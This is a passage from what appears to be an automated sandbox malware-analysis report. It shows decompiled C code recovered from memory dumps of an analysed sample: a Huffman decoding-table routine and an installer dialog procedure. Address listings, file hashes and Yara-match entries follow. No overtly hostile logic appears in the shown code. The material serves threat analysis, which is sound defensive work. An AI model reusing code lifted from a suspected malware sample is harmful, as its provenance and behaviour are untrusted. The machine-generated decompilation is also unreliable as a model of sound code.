				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                                                          0x00407567
                                                                                                                                                                          0x0040756f
                                                                                                                                                                          0x00407573
                                                                                                                                                                          0x00407575
                                                                                                                                                                          0x00407578
                                                                                                                                                                          0x0040757a
                                                                                                                                                                          0x0040757a
                                                                                                                                                                          0x0040757c
                                                                                                                                                                          0x00407583
                                                                                                                                                                          0x00407585
                                                                                                                                                                          0x00407585
                                                                                                                                                                          0x0040758b
                                                                                                                                                                          0x004075a0
                                                                                                                                                                          0x004075a8
                                                                                                                                                                          0x004075aa
                                                                                                                                                                          0x004075ac
                                                                                                                                                                          0x004075af
                                                                                                                                                                          0x004075b0
                                                                                                                                                                          0x004075b0
                                                                                                                                                                          0x004075b6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004075b8
                                                                                                                                                                          0x004075bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004075bb
                                                                                                                                                                          0x004075bf
                                                                                                                                                                          0x004075c2
                                                                                                                                                                          0x004075c4
                                                                                                                                                                          0x004075c4
                                                                                                                                                                          0x004075c7
                                                                                                                                                                          0x004075cd
                                                                                                                                                                          0x004075ce
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004075ce
                                                                                                                                                                          0x004075d3
                                                                                                                                                                          0x004075d6
                                                                                                                                                                          0x004075d8
                                                                                                                                                                          0x004075d8
                                                                                                                                                                          0x004075de
                                                                                                                                                                          0x004075e0
                                                                                                                                                                          0x004075f1
                                                                                                                                                                          0x004075e4
                                                                                                                                                                          0x004075e8
                                                                                                                                                                          0x0040788d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040788d
                                                                                                                                                                          0x004075ee
                                                                                                                                                                          0x004075ef
                                                                                                                                                                          0x004075ef
                                                                                                                                                                          0x004075f7
                                                                                                                                                                          0x004075fa
                                                                                                                                                                          0x004075fe
                                                                                                                                                                          0x00407600
                                                                                                                                                                          0x00407602
                                                                                                                                                                          0x00407605
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040760d
                                                                                                                                                                          0x00407613
                                                                                                                                                                          0x00407615
                                                                                                                                                                          0x00407617
                                                                                                                                                                          0x00407618
                                                                                                                                                                          0x0040762d
                                                                                                                                                                          0x0040762d
                                                                                                                                                                          0x00407630
                                                                                                                                                                          0x00407632
                                                                                                                                                                          0x00407632
                                                                                                                                                                          0x00407634
                                                                                                                                                                          0x00407639
                                                                                                                                                                          0x0040763b
                                                                                                                                                                          0x00407642
                                                                                                                                                                          0x00407644
                                                                                                                                                                          0x0040764c
                                                                                                                                                                          0x0040764c
                                                                                                                                                                          0x0040764e
                                                                                                                                                                          0x0040764f
                                                                                                                                                                          0x0040765e
                                                                                                                                                                          0x00407662
                                                                                                                                                                          0x00407666
                                                                                                                                                                          0x00407669
                                                                                                                                                                          0x0040766c
                                                                                                                                                                          0x00407671
                                                                                                                                                                          0x00407674
                                                                                                                                                                          0x0040767a
                                                                                                                                                                          0x00407681
                                                                                                                                                                          0x00407687
                                                                                                                                                                          0x00407880
                                                                                                                                                                          0x00407880
                                                                                                                                                                          0x00407885
                                                                                                                                                                          0x00407894
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407885
                                                                                                                                                                          0x00407694
                                                                                                                                                                          0x00407697
                                                                                                                                                                          0x0040769a
                                                                                                                                                                          0x0040769d
                                                                                                                                                                          0x004076a1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004076ac
                                                                                                                                                                          0x004076af
                                                                                                                                                                          0x004076b0
                                                                                                                                                                          0x004076b2
                                                                                                                                                                          0x004076b8
                                                                                                                                                                          0x004076bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004076c1
                                                                                                                                                                          0x004076c2
                                                                                                                                                                          0x004076c5
                                                                                                                                                                          0x004076c8
                                                                                                                                                                          0x004076cb
                                                                                                                                                                          0x004076d1
                                                                                                                                                                          0x004076d3
                                                                                                                                                                          0x004076d3
                                                                                                                                                                          0x004076db
                                                                                                                                                                          0x004076df
                                                                                                                                                                          0x004076e4
                                                                                                                                                                          0x00407709
                                                                                                                                                                          0x0040770f
                                                                                                                                                                          0x00407711
                                                                                                                                                                          0x00407713
                                                                                                                                                                          0x00407716
                                                                                                                                                                          0x0040771f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004076e6
                                                                                                                                                                          0x004076e6
                                                                                                                                                                          0x004076ef
                                                                                                                                                                          0x004076f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407704
                                                                                                                                                                          0x00407704
                                                                                                                                                                          0x00407707
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004076f7
                                                                                                                                                                          0x004076fa
                                                                                                                                                                          0x004076fc
                                                                                                                                                                          0x00407700
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407702
                                                                                                                                                                          0x00407702
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407704
                                                                                                                                                                          0x00407728
                                                                                                                                                                          0x0040772e
                                                                                                                                                                          0x00407738
                                                                                                                                                                          0x0040773a
                                                                                                                                                                          0x0040773f
                                                                                                                                                                          0x00407741
                                                                                                                                                                          0x00407777
                                                                                                                                                                          0x00407743
                                                                                                                                                                          0x00407743
                                                                                                                                                                          0x00407746
                                                                                                                                                                          0x00407749
                                                                                                                                                                          0x00407753
                                                                                                                                                                          0x00407756
                                                                                                                                                                          0x0040775d
                                                                                                                                                                          0x00407768
                                                                                                                                                                          0x0040776f
                                                                                                                                                                          0x0040776f
                                                                                                                                                                          0x00407779
                                                                                                                                                                          0x0040777c
                                                                                                                                                                          0x0040777e
                                                                                                                                                                          0x00407784
                                                                                                                                                                          0x00407784
                                                                                                                                                                          0x0040778d
                                                                                                                                                                          0x00407790
                                                                                                                                                                          0x00407795
                                                                                                                                                                          0x004077a4
                                                                                                                                                                          0x004077ac
                                                                                                                                                                          0x004077b1
                                                                                                                                                                          0x004077d5
                                                                                                                                                                          0x004077dd
                                                                                                                                                                          0x004077e1
                                                                                                                                                                          0x004077e7
                                                                                                                                                                          0x004077b3
                                                                                                                                                                          0x004077c1
                                                                                                                                                                          0x004077c4
                                                                                                                                                                          0x004077ca
                                                                                                                                                                          0x004077ca
                                                                                                                                                                          0x004077eb
                                                                                                                                                                          0x004077a6
                                                                                                                                                                          0x004077a6
                                                                                                                                                                          0x004077a6
                                                                                                                                                                          0x004077fc
                                                                                                                                                                          0x00407800
                                                                                                                                                                          0x0040780c
                                                                                                                                                                          0x00407807
                                                                                                                                                                          0x0040780a
                                                                                                                                                                          0x0040780a
                                                                                                                                                                          0x00407814
                                                                                                                                                                          0x00407819
                                                                                                                                                                          0x00407821
                                                                                                                                                                          0x0040781d
                                                                                                                                                                          0x0040781f
                                                                                                                                                                          0x0040781f
                                                                                                                                                                          0x00407827
                                                                                                                                                                          0x00407829
                                                                                                                                                                          0x00407830
                                                                                                                                                                          0x0040783a
                                                                                                                                                                          0x00407844
                                                                                                                                                                          0x00407860
                                                                                                                                                                          0x00407864
                                                                                                                                                                          0x004076a9
                                                                                                                                                                          0x004076af
                                                                                                                                                                          0x004076b0
                                                                                                                                                                          0x004076b2
                                                                                                                                                                          0x004076b8
                                                                                                                                                                          0x004076bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004076bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407846
                                                                                                                                                                          0x00407846
                                                                                                                                                                          0x00407846
                                                                                                                                                                          0x0040784b
                                                                                                                                                                          0x00407854
                                                                                                                                                                          0x0040785d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040785d
                                                                                                                                                                          0x0040786a
                                                                                                                                                                          0x0040786a
                                                                                                                                                                          0x0040786d
                                                                                                                                                                          0x00407874
                                                                                                                                                                          0x00407877
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040769a
                                                                                                                                                                          0x0040761a
                                                                                                                                                                          0x0040761c
                                                                                                                                                                          0x0040761c
                                                                                                                                                                          0x00407620
                                                                                                                                                                          0x00407623
                                                                                                                                                                          0x00407624
                                                                                                                                                                          0x00407624
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040761c
                                                                                                                                                                          0x00407590
                                                                                                                                                                          0x00407596
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                          • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                                                                          • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                          • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02949F6F, Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 30f202cbbdec553c1856992c08911f26e9ea7d02fc9bc62cc7b9f9ffe9b48260
                                                                                                                                                                          • Instruction ID: 0f9b90263200363a567efacb707d87a8fa413ab26af3526ecde54f5f0b233d28
                                                                                                                                                                          • Opcode Fuzzy Hash: 30f202cbbdec553c1856992c08911f26e9ea7d02fc9bc62cc7b9f9ffe9b48260
                                                                                                                                                                          • Instruction Fuzzy Hash: F42102768593D59BCB529F38C9A27EA7BB0FF53314F89059ACCC19E102E3259641C702
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294951D, Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1de62b2f55f8a78d35cfeeb6f02a1b2214f5f1930652ad3fe27996671164caf2
                                                                                                                                                                          • Instruction ID: d95c61c17072e540911141bc4e69c526911ea5e4e675a2eac68e8bef0b824a94
                                                                                                                                                                          • Opcode Fuzzy Hash: 1de62b2f55f8a78d35cfeeb6f02a1b2214f5f1930652ad3fe27996671164caf2
                                                                                                                                                                          • Instruction Fuzzy Hash: 98113274640386CFEB34DE28C984FDA73E6AF98314F95442AD8088B265C770DA82CB10
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294907F, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                                          • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                                                                                                          • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                                          • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404F06, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                          			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
